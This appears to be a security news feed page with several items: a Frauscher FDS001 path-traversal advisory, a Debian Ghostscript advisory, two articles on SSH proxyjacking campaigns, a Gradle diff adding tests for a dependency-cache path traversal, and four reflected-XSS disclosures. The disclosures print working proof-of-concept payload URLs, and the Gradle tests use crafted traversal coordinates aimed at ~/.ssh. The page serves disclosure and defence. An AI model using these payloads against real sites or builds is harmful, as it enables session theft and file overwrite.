Frauscher Sensortechnik GmbH FDS001 for FAdC/FAdCi v1.3.3 and all previous versions are vulnerable to a path traversal vulnerability of the web interface by a crafted URL without authentication. This enables an remote attacker to read all files on the filesystem of the FDS001 device.

2023-07-05 10:00 (CEST) VDE-2023-011  

**Frauscher: Diagnostic System FDS001 for FAdC/FAdCi Path Traversal vulnerability**  
Share: Email | Twitter  

**Published**

2023-07-05 10:00 (CEST)

**Last update**

2023-07-03 07:53 (CEST)

**Vendor(s)**

Frauscher Sensortechnik GmbH  

**Product(s)**

Article No°

Product Name

Affected Version(s)

Diagnostic System FDS101 for FAdC/FAdCi

<= 1.3.3

**Summary**

Frauscher Diagnostic System FDS001 for FAdC R1 and FAdCi R1 v1.3.3 and all previous versions are vulnerable to a path traversal vulnerability of the web interface by a crafted URL without authentication.

**CVE ID**

**Last Update:**

July 3, 2023, 7:48 a.m.

**Severity**

**Weakness**

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')  (CWE-22) 

**Summary**

Frauscher Sensortechnik GmbH FDS001 for FAdC/FAdCi v1.3.3 and all previous versions are vulnerable to a path traversal vulnerability of the web interface by a crafted URL without authentication. This enables an remote attacker to read all files on the filesystem of the FDS001 device.

**Details**

**Impact**

The attacker can read all files on the filesystem of the FDS001 device. Note: Orphaned SSH keys exist on the file system, but they cannot be used to log in to the machine.

**Solution**

**Mitigation**

Security-related application conditions SecRAC  
The railway operator must ensure that only authorised personnel or people in the company of authorised personnel have access to the Frauscher Diagnostic System FDS001.  
The recommendation is to connect the Frauscher Diagnostic System FDS001 to a network of category 2. If the Frauscher Diagnostic System FDS001 is connected to a network of category 3 (according to EN 50159:2010), then additional protective measures must be added.

**Remediation**

For the Frauscher Diagnostic System FDS001 for FAdC R1 and FAdCi R1 no more firmware updates will be provided.

**Reported by**

Frauscher Sensortechnik coordinated with CERT@VDE

CVE-2023-2880: VDE-2023-011 | CERT@VDE

Debian Linux Security Advisory 5446-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, does not properly handle permission validation for pipe devices, which could result in the execution of arbitrary commands if malformed document files are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5446-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJuly 03, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-36664It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,does not properly handle permission validation for pipe devices, whichcould result in the execution of arbitrary commands if malformeddocument files are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 9.53.3~dfsg-7+deb11u5.For the stable distribution (bookworm), this problem has been fixed inversion 10.0.0~dfsg-11+deb12u1.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmSjKvpfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0T5lBAAivkfCmcEfUUjFaT3xhCMNFX5bCHJalKiZ0YpLfLOq6zhveOUoemlI6ValXRmV3kOz7ZdgghXkQ+TxrdcK0GmKy/Mb5Osi4oWU9KcID8Qa/Gu0aEGuz0YCCikyGcaUMlkaZZRtnse5lPOf27avgBDZEkw5vwSXlCEdgleOY/fpX13sKdOrUB5H4Ma79T5RqcLIxMQn/L2YChfjz+3iuY5rfgY50d00g+1r+xomALzQBqYpMFB2iM52gwoBTOQ9nVr2+fuQdfE71ZVHjqOn+xVhJhhKp7fG/uzPz021L1Jec0xvjxh3WGEPfc8kF6sShnoze06l9LfyyVsH629+G0zxcvaK2chku5iJU1zzUh5NQiCMbo6Tdp1c8OxIuuPwdVIRJbMqCDPvz+UJ/KxbnAhN77f/3eb98wTdPWHdW6t5LPdngDxXimHg6RXi2eANVjFOp6XZZ6iju9TvsxPq/MMiBlbD5KPnUK8n6sl8O1b7lHZgy7KU2qFIqWcs482gsrf9ZIMMR4PgNJjp3YQDXjkME/AgUwWKpEx91MKSyc1ygfZYJr7WRnwg81dgTX7hx/GW9fcwprTcGn2H3FmJsnuIYz9wsgLp5x6/WWB1tF7ZGzhYHNgK0QphejDDGTDUTqRcYsiVTkfutBJw2OzDVoIQyrUn78y9Ux1aueF1NM1fMQ==bsYs-----END PGP SIGNATURE-----

Debian Security Advisory 5446-1

Cybercriminals employ obfuscated script to stealthily hijack victim server bandwidth for use in legitimate proxy networks.

Threat actors are exploiting vulnerable secure shell protocol (SSH) servers to launch Docker services that take advantage of an emerging and lucrative attack vector that hijacks a victim's network bandwidth for money.

Researchers from the Akamai Security Intelligence Response Team (SIRT) in June discovered the currently active campaign, which employs an emerging type of attack called proxyjacking, the researchers revealed in a blog post last week.

Threat actors use SSH for remote access and then run malicious scripts that enlist victim servers into a legitimate peer-to-peer (P2P) proxy network, such as Peer2Proxy or Honeygain, without their knowledge, the researchers said. These networks — which use companion apps or software installed on Internet-connected devices — allow someone to share Internet bandwidth by paying to use the IP address of the app users.

"This allows for the attacker to monetize an unsuspecting victim's extra bandwidth, with only a fraction of the resource load that would be required for cryptomining, with less chance of discovery," Allen West, an SIRT security researcher, wrote in the post.

In a nutshell, that is proxyjacking, an emerging attack model that takes advantage of these services and, on a grand scale, potentially can earn cybercriminals hundreds of thousands of dollars per month in passive income, the researchers found.

While the idea of proxyjacking is not new — think of cryptojacking, an entirely illegal endeavor, as a distant cousin — the ability to easily monetize piggybacking on someone's bandwidth as affiliates of mainstream companies is new, which explains why security researchers are seeing more proxyjacking in the threat landscape, West warned.

"Providing a simple path to financial gain makes this vector a threat to both the corporate world and the average consumer alike, heightening the need for awareness and, hopefully, mitigation," he wrote.

Proxyjacking also makes it easy for threat actors to hide their tracks by routing malicious traffic through a multitude of peer nodes before it reaches its final destination, according to the research. This makes the origin of the nefarious activity difficult for victims or researchers to pinpoint — another attractive option for attackers looking to monetize their activity without consequence.

**How the Attack Works**

The first indication of the attack that Akamai researchers identified came when an attacker established multiple SSH connections to one of the company's honeypots using a double Base64-encoded Bash script to obscure the activity. They successfully decoded the script and were able to observe the proxyjacking method of the threat actor down to the exact sequence of operations.

The script transformed the compromised system into a node in the Peer2Profit proxy network, using the account specified by $PACCT as the affiliate that will profit from the shared bandwidth, according to Akamai SIRT. The same process was seen being employed for a Honeygain installation awhile later.

"The script was designed to be stealthy and robust, attempting to operate regardless of the software installed on the host system," West wrote.

The script goes on to execute various functions, one of which is to download an actual, unmodified version of cURL, a command-line tool that enables data exchange between a device and a server through a terminal.

This tool seems to be all the attackers need for the scheme to work, and, "if it is not present on the victim host, then the attacker downloads it on their behalf," West wrote.

The executable cancels any containers running on the node to install a Docker container to handle the proxyjacking process and, once everything is in place, the attacker can exit the network without a trace.

**How Do You Defend Against Proxyjacking?**

Because of the growing prevalence of and the relative ease with which attackers can set up proxyjacking attacks, and inability to identify original perpetrators, organizations need to maintain vigilance on their networks so as to notice abnormal behavior in how their resources are being used to avoid compromise, the researchers recommend.

For the particular attack that the Akamai team observed, attackers used SSH to gain access to a server and install a Docker container. To avoid this type of attack, organizations can check their locally running Docker services to locate any unwanted resource sharing the system, according to Akamai. If they find one, the intrusion should be investigated and a determination of how the script was uploaded and run should be made, after which organizations should perform a thorough clean-up.

Also unique to the attack is that the executable in the form of the cURL tool would likely go overlooked by most companies, since that tool can be used legitimately. However, in this case, it was the initial artifact in the attack that led the researchers to investigate deeper, West said.

"It was the ability to look at the source of the artifact that took it from a harmless piece of code to what we now know is part of a proxyjacking scheme," he explained, which "highlights the importance of being able to isolate all unusual artifacts, not just those that are considered malicious."

Moreover, because proxyjacking attackers also use vulnerabilities to mount attacks — that was the case in a recent attack that leveraged the infamous Log4j flaw — organizations should maintain updated assets and apply patches to applications whenever available, particularly when vulnerabilities already have been exploited, the research recommends.

West added: "Users with deeper knowledge of computer security can additionally remain vigilant by paying attention to the containers currently running, monitoring network traffic for anomalies, and even running vulnerability scans on a regular basis."

SSH Servers Hit in 'Proxyjacking' Cyberattacks

Inout Search Engine AI Edition version 1.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.inoutscripts.com/products/inout-search-engine-ai-edition/      ││  Vendor   : Inout Scripts                                                              ││  Software : Inout Search Engine AI Edition 1.1                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka          CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'page' parameter is vulnerable to RXSShttps://website/index.php?page=index%2findexl7fex%3cimg%20src%3da%20onerror%3dalert(1)%3ed392j&type=Web[-] Done

A researcher at Akamai has posted a blog about a worrying new trend—proxyjacking—where criminals sell your bandwidth to a third-party proxy service.

To understand how proxyjacking works, we’ll need to explain a few things.

There are several legitimate services that pay users to share their surplus Internet bandwidth, such as Peer2Profit and HoneyGain. The participants install software that adds their systems to the proxy-network of the service. Customers of the proxy service have their traffic routed through the participants' systems.

The foundation of the proxyjacking problem lies in the fact that these services don’t check where the shared bandwidth is coming from. Peer2Profit and Honeygain claim to only share their proxies with theoretically vetted partners, but according to Akamai's research they don’t check if the one offering the bandwidth is the actual owner.

Proxies and stolen bandwidth have always been popular among cybercriminals since they allow them to anonymize their traffic. What’s new about this campaign is that these same criminals are now “renting out” the bandwidth of compromised systems to make money instead of simply using them.

The researcher became aware of the campaign when they noticed an attacker establishing multiple SSH (Secure Shell) connections to one of their Cowrie honeypots. Cowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. It can be used to emulate a UNIX system in Python, or to function as an SSH and telnet proxy to observe attacker behavior to another system.

For the criminals the beauty of the attack is that it is mostly fileless and the files that are actually used, curl and the public Docker images for the proxy monetization services Peer2Profit and Honeygain, are legitimate and will not be detected by anti-malware solutions.

And proxyjacking is a lot less likely to be detected than cryptojacking since it requires only minimal CPU cycles and uses surplus Internet bandwidth. Interesting to note, the researchers found out that the compromised distribution server also contained a cryptomining utility, as well as many other exploits and common hacking tools.

**Protection**

Since these seemingly legitimate services can be used by criminals on both ends, both to anonymize their activities and to sell others’ resources, we would rather see them disappear altogether, but they should at least improve the verification of their customers and their participants.

Home users can protect themselves from proxyjacking by:

*   Keeping their systems and software updated
*   Use an effective and secure password strategy

Corporate users can add:

*   Monitor network traffic for anomalies
*   Keep track of running containerized applications.
*   Using key-based authentication for SSH instead of passwords

Akamai added:

> “In this particular campaign, we saw the use of SSH to gain access to a server and install a Docker container, but past campaigns have exploited web vulnerabilities as well. If you check your local running Docker services and find any unwanted resource sharing on your system, you should investigate the intrusion, determine how the script was uploaded and run, and perform a thorough cleanup.”

If you lack the time and resources for constant monitoring, Malwarebytes can offer Managed Detection and Response (MDR). Want to learn more about how we can help protect your business? Get in touch.

TRY NOW

A proxyjacking campaign is looking for vulnerable SSH servers

Gradle is a build tool with a focus on build automation and support for multi-language development. When Gradle writes a dependency into its dependency cache, it uses the dependency's coordinates to compute a file location. With specially crafted dependency coordinates, Gradle can be made to write files into an unintended location. The file may be written outside the dependency cache or over another file in the dependency cache. This vulnerability could be used to poison the dependency cache or overwrite important files elsewhere on the filesystem where the Gradle process has write permissions. Exploiting this vulnerability requires an attacker to have control over a dependency repository used by the Gradle build or have the ability to modify the build's configuration. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Gradle will refuse to cache dependencies that have path traversal elements in their dependency coordinates. It is recommended that users upgrade to a patched version. If you are unable to upgrade to Gradle 7.6.2 or 8.2, `dependency verification` will make this vulnerability more difficult to exploit.

Expand Up @@ -20,6 +20,8 @@ import org.gradle.cache.internal.scopes.DefaultCacheScopeMapping import org.gradle.integtests.fixtures.AbstractHttpDependencyResolutionTest import org.gradle.integtests.fixtures.ToBeFixedForConfigurationCache import org.gradle.integtests.fixtures.cache.CachingIntegrationFixture import org.gradle.internal.hash.Hashing import org.gradle.test.fixtures.file.TestFile  
import java.nio.file.Files  
Expand Down Expand Up @@ -153,6 +155,155 @@ task listJars { succeeds('listJars') }  
def 'cannot write cache entries outside of GAV'() { given: def fakeDep \= temporaryFolder.testDirectory.file('fake-repo/pwned.txt') fakeDep << """ Hello world! """ def hash \= Hashing.sha1().hashFile(fakeDep).toString() def hashOfBootJar \= '1234' // for demo purpose def invalidPath \= "org.spring/core/1.0/$hash/artifact-1.0./../../../../boot/2.0/$hashOfBootJar/pwned.txt" def invalidLocation \= executer.gradleUserHomeDir.file(cachePath + invalidPath).canonicalFile  
server.allowGetOrHead("/repo/org/boot/2.0/$hashOfBootJar/pwned.txt", fakeDep)  
and: withValidJavaSource() buildWithJavaLibraryAndMavenRepoArtifactOnly()  
and: buildFile << """ dependencies { implementation 'org.spring:core:1.0@/../../../../boot/2.0/$hashOfBootJar/pwned.txt' } """  
when: fails('compileJava')  
then: failureCauseContains('is not a safe zip entry name') // If the build did not fail, Gradle would effectively write a file inside org.spring/boot/2.0 instead of inside org.spring/core/1.0 // If we have the real hash of a JAR in those other coordinates, Gradle could overwrite and replace the real JAR with a malicious one !invalidLocation.exists() }  
def 'cannot write cache entries outside of dependency cache'() { given: def fakeDep \= temporaryFolder.testDirectory.file('fake-repo/pwned.txt') fakeDep << """ Hello world! """ // Code block used to verify what happens if the build succeeds def hash \= Hashing.sha1().hashFile(fakeDep).toString() def invalidPath \= "org.spring/../../../../../core/1.0/$hash/artifact-1.0./../../../../.ssh/pwned.txt" def invalidLocation \= executer.gradleUserHomeDir.file(cachePath + invalidPath).canonicalFile  
server.allowGetOrHead('/repo/org/.ssh/pwned.txt', fakeDep)  
and: withValidJavaSource() buildWithJavaLibraryAndMavenRepoArtifactOnly()  
and: buildFile << """ dependencies { implementation 'org.spring/../../../../../:core:1.0@/../../../../.ssh/pwned.txt' } """  
when: fails('compileJava')  
then: failureCauseContains('is not a safe zip entry name') // If the build did not fail, Gradle would effectively write a file inside a folder that is a sibling to the Gradle User Home // If this was ~/.gradle, Gradle would have written in ~/.ssh !invalidLocation.exists() }  
def 'cannot write cache entries anywhere on disk using metadata'() { given: // Our crafty coordinates def pwnedDep \= mavenRepo.module('org.spring/../../../../../', 'core') // Our abused coordinates that will see a POM request def abusedCoordinates \= mavenHttpRepo.module('org.spring', 'core', '1.0').publish() // Defeat the Gradle validation that will verify metadata content match requested coordinates abusedCoordinates.pom.file.replace('<groupId>org.spring</groupId>', '<groupId>org.spring/../../../../../</groupId>') // Our test dependency that now has a crafty dependency itself def testDep \= mavenHttpRepo.module('org.test', 'test').dependsOn(pwnedDep, type: '/../../../../.ssh/pwned.txt').publish()  
def fakeDep \= temporaryFolder.testDirectory.file('fake-repo/pwned.txt') fakeDep << """ Hello world! """ def hash \= Hashing.sha1().hashFile(fakeDep).toString() def invalidPath \= "org.spring/../../../../../core/1.0/$hash/artifact-1.0./../../../../.ssh/pwned.txt" def invalidLocation \= executer.gradleUserHomeDir.file(cachePath + invalidPath).canonicalFile  
testDep.allowAll() abusedCoordinates.allowAll() server.allowGetOrHead('/repo/org/.ssh/pwned.txt', fakeDep)  
and: withValidJavaSource() buildWithJavaLibraryAndMavenRepo()  
and: buildFile << """ dependencies { implementation 'org.test:test:1.0' } """  
when: fails('compileJava')  
then: failureCauseContains('is not a safe zip entry name') // If the build did not fail, Gradle would effectively write a file inside a folder that is a sibling to the Gradle User Home // If this was ~/.gradle, Gradle would have written in ~/.ssh !invalidLocation.exists() }  
private String getCachePath() { "caches/${CacheLayout.ROOT.key}/${CacheLayout.FILE\_STORE.key}/" }  
private void buildWithJavaLibraryAndMavenRepoArtifactOnly() { buildFile << """ plugins { id('java-library') } repositories { maven { url "${mavenHttpRepo.uri}" metadataSources { artifact() } } } """ }  
private void buildWithJavaLibraryAndMavenRepo() { buildFile << """ plugins { id('java-library') } repositories { maven { url "${mavenHttpRepo.uri}" } } """ }  
private TestFile withValidJavaSource() { temporaryFolder.testDirectory.file('src/main/java/org/test/Base.java') << """ package org.test; public class Base {} """ }  
def relocateCachesAndChangeGradleHome() { def otherHome \= executer.gradleUserHomeDir.parentFile.createDir('other-home') def otherCacheDir \= otherHome.toPath().resolve(DefaultCacheScopeMapping.GLOBAL\_CACHE\_DIR\_NAME) Expand Down

CVE-2023-35946: Fix dependency cache path traversal vulnerability · gradle/gradle@859eae2

GZ Multi Hotel Booking System version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-multi-hotel-booking-system.html                   ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Multi Hotel Booking System 1.8                                          ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'adults' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefinedxzk17%22%3e%3cscript%3ealert(1)%3c%2fscript%3ez85vz&children=undefined&cal_id=2Path: /index.phpGET 'children' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefinedfdyyb%22%3e%3cscript%3ealert(1)%3c%2fscript%3ecwp1x&cal_id=2Path: /index.phpGET 'cal_id' parameter is vulnerable to RXSShttps://website/index.php?controller=GzFront&action=getAvailabilityPackages&date_from=undefined&date_to=undefined&adults=undefined&children=undefined&cal_id=2kf9oz%22%3e%3cscript%3ealert(1)%3c%2fscript%3exqwmm[-] Done

GZ Multi Hotel Booking System 1.8 Cross Site Scripting

GZ E Learning Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/gz-e-learning-platform.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ E Learning Platform 1.8                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /URL parameter is vulnerable to RXSShttps://website/index.php/sxiqd"><script>alert(1)</script>ilec2?controller=GzUser&action=edit&id=5[-] Done

GZ E Learning Platform 1.8 Cross Site Scripting

CRM Platform version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-crm-platform.html                                ││  Vendor   : GZ Scripts                                                                 ││  Software : CRM Platform 1.8                                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET 'action' parameter is vulnerable to RXSShttps://website/index.php?controller=GzAdmin&action=dashboardpsrfg%3cscript%3ealert(1)%3c%2fscript%3ea4o1z&err=2[-] Done

CRM Platform 1.8 Cross Site Scripting

Property Listing Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/property-listing-script.html                         ││  Vendor   : GZ Scripts                                                                 ││  Software : Property Listing Script 1.0                                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttps://website/preview.php?&page=j5wno%22%3e%3cscript%3ealert(1)%3c%2fscript%3epjd8c&sort_by=ascpricePath: /preview.phpGET 'layout' parameter is vulnerable to RXSShttps://website/preview.php?layout=gridpv063%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg46bcPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttps://website/preview.php?&page=1&sort_by=orbb0%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhv9a[-] Done

Tag

#ssh